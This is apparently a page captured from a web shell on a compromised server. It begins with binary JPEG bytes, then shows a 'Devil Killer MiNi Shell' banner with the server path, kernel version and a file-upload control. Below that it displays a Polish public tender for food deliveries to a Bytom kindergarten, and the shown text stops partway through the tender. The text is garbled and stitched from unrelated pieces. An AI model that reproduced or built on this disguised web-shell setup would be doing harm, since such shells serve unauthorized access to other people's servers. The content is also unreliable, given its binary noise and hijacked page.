JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230118/0004053001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa żywności dla potrzeb Przedszkola Miejskiego nr 24 w Bytomiu w 2023r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PRZEDSZKOLE MIEJSKIE NR 24 W BYTOMIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271068670</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Okulickiego 12B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bytom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-902</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">327875158</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przedszkole24@onet.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pm24bytom.dlaprzedszkoli.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - związek jednostek samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa żywności dla potrzeb Przedszkola Miejskiego nr 24 w Bytomiu w 2023r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d0c9e8ce-9640-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00040530</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00500062/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa żywności na potrzeby Przedszkola Miejskiego nr 24 w Bytomiu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d0c9e8ce-9640-11ed-94da-6ae0fe5e7159 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. <br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne. Zamawiający wyznacza następujące osoby do kontaktu z wykonawcami: <br/>Barbarę Grzesica<br/>Adres strony internetowej prowadzonego postępowania https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-d0c9e8ce-9640-11ed-94da-6ae0fe5e7159<br/>Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/konkursy”). <br/>Identyfikator (ID) postępowania na Platformie e-Zamówienia: ocds-148610-d0c9e8ce-9640-11ed-94da-6ae0fe5e7159<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia .</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem typu zewnętrznego lub wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści SWZ wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art.13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1)	administratorem Pani/Pana danych osobowych jest : Przedszkole Miejskie nr 24, 41-902 w Bytomiu ul. Gen. N. Okulickiego 12B ; mail : przedszkole24@onet.eu <br/>2)	dane kontaktowe inspektora ochrony danych osobowych :Urząd Miejski w Bytomiu ul. Smolenia 35 <br/>e-mail : iod_edu@um.bytom.pl<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art.6 ust.1 lit.c RODO w celu<br/>związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego (a w przypadku dokonania wyboru złożonej oferty jako najkorzystniejszej i zawarciu umowy, także w celu związanym z realizacją zamówienia);<br/>4)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia Prawo zamówień publicznych. <br/>5)	Pani/Pana dane osobowe będą przechowywane do czasu zniszczenia dokumentacji postępowania zgodnie z obowiązującymi przepisami prawa lub umową o dofinansowanie, lecz nie krócej niż przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy (zgodnie z art.78 ust.4 ustawy Prawo zamówień publicznych).<br/>6)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Prawo zamówień publicznych, związanych z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z ustawy Prawo zamówień publicznych.<br/>7)	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.22 RODO.<br/>8)	Posiada Pani/Pan:<br/>a)	na podstawie art.15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>b)	na podstawie art.16 RODO prawo do sprostowania Pani/Pana danych osobowych*;<br/>* skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania <br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników<br/>c) na podstawie art.18 RODO prawo żądania od administratora ograniczenia przetwarzania danych <br/> osobowych z zastrzeżeniem przypadków, o których mowa w art.18 ust.2 RODO **;<br/>** prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/> a) w związku z art.17 ust.3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/> b) prawo do przenoszenia danych osobowych, których mowa w art.20 RODO,<br/> c) na podstawie art.21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą <br/> prawną przetwarzania Pani/Pana danych osobowych jest art.6 ust.1 lit. c RODO. <br/>1. Jednocześnie Zamawiający przypomina o ciążącym na Wykonawcy obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.<br/>2. Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp.<br/>3. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PM24.ZP.261.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostarczane pieczywo nie może być wypiekane z ciasta mrożonego. Nie może być również mrożone ani rozmrażane po upieczeniu. Powinno być świeże , wypieczone nie wcześniej nić 6 godzin przed dostawą do Zamawiającego . Powinno być chrupkie, nie gumiaste, nie przypalone, wyprodukowane z najwyższej jakości składników. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert w zakresie poszczególnych kryteriów dokonana zostanie wg następujących <br/> zasad:<br/><br/>2. cena (X1), ocenie podlegać będzie cena brutto wyrażona w PLN <br/>skala pkt: 0-60<br/> najniższa oferowana cena <br/> (X1) ilość pkt przyznana danej ofercie = ------------------------------- x 60 pkt <br/> badana cena <br/><br/>2.1 Przy obliczaniu liczby punktów w kryterium: Godzina dostawy codziennie <br/>do godz. 07.30 . ( X2 ) Zamawiający zastosuje następujące wyliczenie:<br/>•	Godzina dostawy po godz. 7.30 – 0 pkt<br/>•	Godzina dostawy do godz. 7.30 – 10 pkt<br/>•	Godzina dostawy do godz. 7.00 – 20 pkt<br/><br/> <br/>2.2.	Przy obliczaniu liczby punktów w kryterium czas dodatkowej dostawy lub uzupełnienie braku ( X3 ) Zamawiający zastosuje następujące wyliczenie:<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku powyżej 2 godzin – 0 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 2 godzin – 5 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 1 godziny – 10 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 0,5 godzin – 20 pkt<br/><br/><br/>Maksymalny dopuszczalny przez Zamawiającego czas wynosi 6 godzin od chwili zgłoszenia nieprawidłowości przez Zamawiającego (ustnie podczas odbioru dostawy lub telefonicznie, mailem). Wykonawca wskazuje w Formularzu ofertowym (zał. Nr 1 do SWZ) oferowany czas wymiany towaru na pełnowartościowy lub na uzupełnienie braku. Wykonawca winien zaoferować czas wymiany towaru w pełnych godzinach, w przypadku zaoferowania czasu <br/>z podaniem minut punktacja zostanie przyznana odpowiednio za wyższą ilość godzin, np. przy zaoferowaniu 2 godzin i 10 minut Zamawiający przyzna 0 pkt. <br/>Dostawa do Zamawiającego winna być dokonana maksymalnie do godz. 07.30. Zamawiający przyzna odpowiednie punkty według wskazań Wykonawcy w Formularzu ofertowym ( zał. Nr 1 do SWZ ). Wykonawca winien podać godziny dostawy wskazane w podpunkcie 2.1 . W przypadku zaoferowania godziny dostawy z podaniem minut , punktacja zostanie przyznana odpowiednio za późniejszą godzinę dostawy np.: przy zaoferowaniu godz. 07.15 zamawiający uzna to za godzinę 07.30. i przyzna 10 pkt. <br/><br/>3. Ocena punktowa przyznana ofercie (X) będzie sumą punktów przyznanych w ramach kryteriów oceny ofert i zostanie obliczona jako X = X1+X2+X3. Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. <br/>4. Za najkorzystniejszą ofertę zostanie uznana oferta niepodlegająca odrzuceniu, która otrzyma największą ilość punktów zgodnie z kryteriami oceny ofert określonymi w pkt 1 oraz sposobem ich oceny, określonym w pkt 2.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">cas wymiany towaru na pełnowartościowy lub uzupełnienie braków</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Nabiał i produkty mleczarskie powinny być świeże, po otwarciu produktu powinny mieć dobry smak, sery nie zbrylone ,jogurty gęste. Termin do spożycia nie może być krótszy niż 14 dni od dnia dostawy do Zamawiającego dla produktów : twarogi, kefir, nie krótszy niż 21 dni od daty dostawy dla produktów : masło, śmietana, sery, serki, jogurty , drożdże. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert w zakresie poszczególnych kryteriów dokonana zostanie wg następujących <br/> zasad:<br/><br/>2. cena (X1), ocenie podlegać będzie cena brutto wyrażona w PLN <br/>skala pkt: 0-60<br/> najniższa oferowana cena <br/> (X1) ilość pkt przyznana danej ofercie = ------------------------------- x 60 pkt <br/> badana cena <br/><br/>2.1 Przy obliczaniu liczby punktów w kryterium: Godzina dostawy codziennie <br/>do godz. 07.30 . ( X2 ) Zamawiający zastosuje następujące wyliczenie:<br/>•	Godzina dostawy po godz. 7.30 – 0 pkt<br/>•	Godzina dostawy do godz. 7.30 – 10 pkt<br/>•	Godzina dostawy do godz. 7.00 – 20 pkt<br/><br/> <br/>2.2.	Przy obliczaniu liczby punktów w kryterium czas dodatkowej dostawy lub uzupełnienie braku ( X3 ) Zamawiający zastosuje następujące wyliczenie:<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku powyżej 2 godzin – 0 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 2 godzin – 5 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 1 godziny – 10 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 0,5 godzin – 20 pkt<br/><br/><br/>Maksymalny dopuszczalny przez Zamawiającego czas wynosi 6 godzin od chwili zgłoszenia nieprawidłowości przez Zamawiającego (ustnie podczas odbioru dostawy lub telefonicznie, mailem). Wykonawca wskazuje w Formularzu ofertowym (zał. Nr 1 do SWZ) oferowany czas wymiany towaru na pełnowartościowy lub na uzupełnienie braku. Wykonawca winien zaoferować czas wymiany towaru w pełnych godzinach, w przypadku zaoferowania czasu <br/>z podaniem minut punktacja zostanie przyznana odpowiednio za wyższą ilość godzin, np. przy zaoferowaniu 2 godzin i 10 minut Zamawiający przyzna 0 pkt. <br/>Dostawa do Zamawiającego winna być dokonana maksymalnie do godz. 07.30. Zamawiający przyzna odpowiednie punkty według wskazań Wykonawcy w Formularzu ofertowym ( zał. Nr 1 do SWZ ). Wykonawca winien podać godziny dostawy wskazane w podpunkcie 2.1 . W przypadku zaoferowania godziny dostawy z podaniem minut , punktacja zostanie przyznana odpowiednio za późniejszą godzinę dostawy np.: przy zaoferowaniu godz. 07.15 zamawiający uzna to za godzinę 07.30. i przyzna 10 pkt. <br/><br/>3. Ocena punktowa przyznana ofercie (X) będzie sumą punktów przyznanych w ramach kryteriów oceny ofert i zostanie obliczona jako X = X1+X2+X3. Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. <br/>4. Za najkorzystniejszą ofertę zostanie uznana oferta niepodlegająca odrzuceniu, która otrzyma największą ilość punktów zgodnie z kryteriami oceny ofert określonymi w pkt 1 oraz sposobem ich oceny, określonym w pkt 2.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa do godz. 07.30</span></h3> 